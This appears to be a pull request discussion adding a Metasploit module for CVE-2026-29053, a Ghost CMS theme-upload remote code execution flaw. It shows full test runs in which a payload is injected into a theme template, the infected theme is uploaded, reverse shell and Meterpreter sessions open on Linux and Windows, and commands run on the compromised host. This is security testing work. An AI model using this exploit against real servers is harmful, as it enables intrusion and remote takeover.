Add CVE-2026-29053

[vognik]

Vulnerability Details

This module exploits a Remote Code Execution (RCE) vulnerability in Ghost CMS.
Specifically crafted malicious themes can execute arbitrary code on the server running Ghost.

Module Information

Module path: modules/exploits/multi/http/ghostcms_cve_2026_29053.rb
Platform: Linux/Unix/Windows

References

• https://nvd.nist.gov/vuln/detail/CVE-2026-29053
• GHSA-cgc2-rcrh-qr5x
• https://www.endorlabs.com/learn/rce-in-ghost-cms-ghsa-cgc2-rcrh-qr5x

Test Output

Linux

msf6 > use multi/http/ghostcms_cve_2026_29053
[*] No payload configured, defaulting to cmd/unix/reverse_nodejs
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RPORT 2368
RPORT => 2368
msf exploit(multi/http/ghostcms_cve_2026_29053) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/ghostcms_cve_2026_29053) > set USERNAME test@gmail.com
USERNAME => test@gmail.com
msf exploit(multi/http/ghostcms_cve_2026_29053) > set PASSWORD 16pm1ewtya
PASSWORD => 16pm1ewtya
msf exploit(multi/http/ghostcms_cve_2026_29053) > run
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Authenticating via session (user: test@gmail.com)...
[!] Ghost CMS requires a 6-digit verification code from your email.
[*] Enter the 6-digit verification code: 738757
[*] Verifying session with code: 738757...
[+] 2FA verification successful! Session established.
[+] Authentication successful!
[*] Downloading active theme 'source' from server...
[*] Injecting payload into: page-fltyuvdvtgcgi.hbs
[*] Uploading infected theme: wfnlfezetpeeoggx
[*] Triggering payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.18.0.3:48654) at 2026-04-04 19:16:26 -0400
whoami
node
cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Windows

msf > use multi/http/ghostcms_cve_2026_29053
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/ghostcms_cve_2026_29053) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RHOSTS 192.168.19.148
RHOSTS => 192.168.19.148
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RPORT 2368
RPORT => 2368
msf exploit(multi/http/ghostcms_cve_2026_29053) > set USERNAME test@gmail.com
USERNAME => test@gmail.com
msf exploit(multi/http/ghostcms_cve_2026_29053) > set PASSWORD 16pm1ewtya
PASSWORD => 16pm1ewtya
msf exploit(multi/http/ghostcms_cve_2026_29053) > set target 1
target => 1
msf exploit(multi/http/ghostcms_cve_2026_29053) > run
[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending stage (232006 bytes) to 192.168.19.148
[+] The target appears to be vulnerable.
[*] Authenticating via session (user: test@gmail.com)...
[+] Session established via password.
[+] Authentication successful!
[*] Downloading active theme 'esnraytnjot' from server...
[*] Injecting payload into: author-john.hbs
[*] Uploading infected theme: fcffvppatcvqkzf
[*] Triggering payload...
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.148:53278) at 2026-04-04 13:22:38 -0400

meterpreter > sysinfo
Computer        : DESKTOP-vognik
OS              : Windows 10 21H2.
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-vognik\vognik

[h00die]

Are all of these files required to get the exploit working? There are a LOT of files for the theme, the yarn.lock file itself is 3,500 lines of code.

If they are all required id suggest zipping them all together since you likely do that in the code anyways. Then if you need to adjust anything in the zip, just do it in memory.

However, we'd want a minimalistic theme for exploiting, so really look at what's required and what's not.

[vognik]

If they are all required id suggest zipping them all together since you likely do that in the code anyways. Then if you need to adjust anything in the zip, just do it in memory.

@h00die Sorry, I didn't notice count of lines earlier before committing. Anyway i wanted to give the end user more flexibility if they want to add new files. It’s more convenient to add them to a folder rather than pack/unpack an archive every time.